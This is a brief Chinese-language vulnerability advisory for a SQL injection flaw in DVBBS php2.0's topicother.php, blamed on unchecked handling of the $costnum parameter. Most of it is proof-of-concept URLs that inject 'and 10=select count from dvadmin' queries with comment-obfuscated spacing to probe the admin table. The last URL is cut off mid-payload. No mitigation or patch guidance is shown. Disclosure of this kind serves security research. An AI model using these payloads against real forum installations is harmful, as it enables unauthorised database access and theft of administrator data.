DVBBS php2.0 topicother.php 注入漏洞
topicother.php中在处理$costnum参数时,没有进行严格的考虑,存在SQL注入漏洞。 DVBBS php2.0 http://www.dvbbs.net http://p.dvbbs.net/topicother.php?t=9&action=join&activeid=1//and//10=select//count//from//dvadmin http://p.dvbbs.net/topicother.php?/topicother.php?t=9&action=join&boardid=2&id=1&activeid=1//and//1=selec...